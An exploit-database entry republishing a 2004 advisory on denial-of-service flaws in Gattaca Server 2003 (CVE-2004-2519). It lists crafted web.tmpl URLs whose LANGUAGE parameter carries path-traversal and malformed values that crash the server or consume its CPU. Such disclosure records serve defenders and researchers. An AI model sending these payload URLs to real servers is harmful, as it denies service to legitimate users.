Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)



EKU-ID: 29696 CVE: CVE-2004-2519;OSVDB-7924 OSVDB-ID:
Author: dr_insane Published: 2004-07-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/10728/info

It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.

These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.

Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.

http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en